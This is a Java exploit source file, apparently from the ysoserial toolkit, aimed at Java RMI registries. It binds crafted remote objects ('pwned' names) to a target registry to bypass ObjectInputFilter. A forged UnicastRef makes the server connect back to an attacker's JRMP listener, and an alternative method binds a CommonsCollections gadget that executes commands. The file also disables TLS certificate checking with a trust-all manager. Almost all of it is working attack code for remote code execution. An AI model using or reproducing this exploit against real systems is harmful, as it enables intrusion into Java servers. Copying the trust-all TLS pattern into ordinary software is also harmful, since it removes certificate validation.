package ysoserial.exploit.rmi;

/**
 * @ClassName: RMIExploit
 * @Description: ToDo
 * @Author: angelwhu
 * @Create: 2019/03/13 13:24
 **/

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import sun.rmi.server.UnicastRef;
import sun.rmi.server.UnicastServerRef;
import ysoserial.payloads.CommonsCollections1;
import ysoserial.payloads.ObjectPayload;
import ysoserial.payloads.ObjectPayload.Utils;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.Reflections;
import ysoserial.secmgr.ExecCheckingSecurityManager;
import sun.rmi.registry.RegistryImpl;

import javax.management.remote.rmi.RMIConnectionImpl_Stub;
import javax.net.ssl.*;
import java.io.IOException;
import java.io.ObjectInput;
import java.io.ObjectOutput;
import java.io.Serializable;
import java.lang.reflect.*;
import java.net.Socket;
import java.rmi.ConnectIOException;
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.rmi.activation.Activator;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.*;
import java.security.cert.X509Certificate;
import java.util.concurrent.Callable;

/**
 * 使用UnicastRef注入，绕过ObjectInputFilter checkInput对几个基础类型的检测
 * sun.rmi.registry.
 */
public class RMIExploit {
    private static class TrustAllSSL extends X509ExtendedTrustManager {
        private static final X509Certificate[] ANY_CA = {};

        @Override
        public X509Certificate[] getAcceptedIssuers() {
            return ANY_CA;
        }

        @Override
        public void checkServerTrusted(final X509Certificate[] c, final String t) { /* Do nothing/accept all */ }
        @Override
        public void checkClientTrusted(final X509Certificate[] c, final String t) { /* Do nothing/accept all */ }
        @Override
        public void checkServerTrusted(final X509Certificate[] c, final String t, final SSLEngine e) { /* Do nothing/accept all */ }
        @Override
        public void checkServerTrusted(final X509Certificate[] c, final String t, final Socket e) { /* Do nothing/accept all */ }
        @Override
        public void checkClientTrusted(final X509Certificate[] c, final String t, final SSLEngine e) { /* Do nothing/accept all */ }
        @Override
        public void checkClientTrusted(final X509Certificate[] c, final String t, final Socket e) { /* Do nothing/accept all */ }
    }

    private static class RMISSLClientSocketFactory implements RMIClientSocketFactory {
        @Override
        public Socket createSocket(String host, int port) throws IOException {
            try {
                SSLContext ctx = SSLContext.getInstance("TLS");
                ctx.init(null, new TrustManager[]{new TrustAllSSL()}, null);
                SSLSocketFactory factory = ctx.getSocketFactory();
                return factory.createSocket(host, port);
            } catch (Exception e) {
                throw new IOException(e);
            }
        }
    }

    public static void main(final String[] args) throws Exception {
        System.out.println("用法如下 RMIRegistryHost  RMIRegistryPort JRMPListenerHost JRMPListenerPort");
        final String rmiRegistryHost = args[0];
        final int rmiRegistryPort = Integer.parseInt(args[1]);
        final String jrmpListenerHost = args[2];
        final int jrmpListenerPort = Integer.parseInt(args[3]);
        Registry registry = LocateRegistry.getRegistry(rmiRegistryHost, rmiRegistryPort);

        // test RMI registry connection and upgrade to SSL connection on fail
        try {
            registry.list();
        } catch (ConnectIOException ex) {
            registry = LocateRegistry.getRegistry(rmiRegistryHost, rmiRegistryPort, new RMISSLClientSocketFactory());
        }

        // ensure payload doesn't detonate during construction or deserialization
        exploit(registry, jrmpListenerHost, jrmpListenerPort);
    }

    public static void exploit(final Registry registry,
                               final Class<? extends ObjectPayload> payloadClass,
                               final String command) throws Exception {
        new ExecCheckingSecurityManager().callWrapped(new Callable<Void>() {
            public Void call() throws Exception {
                ObjectPayload payloadObj = payloadClass.newInstance();
                Object payload = payloadObj.getObject(command);
                String name = "pwned" + System.nanoTime();
                Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap(name, payload), Remote.class);
                try {
                    registry.bind(name, remote);
                } catch (Throwable e) {
                    e.printStackTrace();
                }
                Utils.releasePayload(payloadObj, payload);
                return null;
            }
        });
    }

    public static void exploit(final Registry registry, final String jrmpListenerHost, final int jrmpListenerPort) throws Exception {

        UnicastRef unicastRef = generateUnicastRef(jrmpListenerHost, jrmpListenerPort);
        /*
        poc 1*/
        RMIConnectionImpl_Stub remote = new RMIConnectionImpl_Stub(unicastRef);
        /*
        poc2
        Remote remote = (Remote) Proxy.newProxyInstance(RemoteRef.class.getClassLoader(), new Class<?>[]{Activator.class}, new PocHandler(unicastRef));
         */
        /*
        poc3
        Remote remote = (Remote) Proxy.newProxyInstance(RemoteRef.class.getClassLoader(), new Class<?>[] { Activator.class }, new RemoteObjectInvocationHandler(unicastRef));
         */
        /*
        poc4 失败，无效
        UnicastRemoteObject remote = Reflections.createWithoutConstructor(java.rmi.server.UnicastRemoteObject.class);
        Reflections.setFieldValue(unicastRemoteObject, "ref", unicastRef);
        */
        String name = "pwned" + System.nanoTime();
        try {
            registry.bind(name, remote);
        } catch (Throwable e) {
            e.printStackTrace();
        }
    }

    /***
     * 生成一个UnicastRef对象
     * @param host
     * @param port
     * @return
     */
    public static UnicastRef generateUnicastRef(String host, int port) {
        java.rmi.server.ObjID objId = new java.rmi.server.ObjID();
        sun.rmi.transport.tcp.TCPEndpoint endpoint = new sun.rmi.transport.tcp.TCPEndpoint(host, port);
        sun.rmi.transport.LiveRef liveRef = new sun.rmi.transport.LiveRef(objId, endpoint, false);
        return new sun.rmi.server.UnicastRef(liveRef);
    }

    public static class PocHandler implements InvocationHandler, Serializable {
        private RemoteRef ref;

        protected PocHandler(RemoteRef newref) {
            ref = newref;
        }


        @Override
        public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
            return method.invoke(this.ref, args);
        }
    }

}
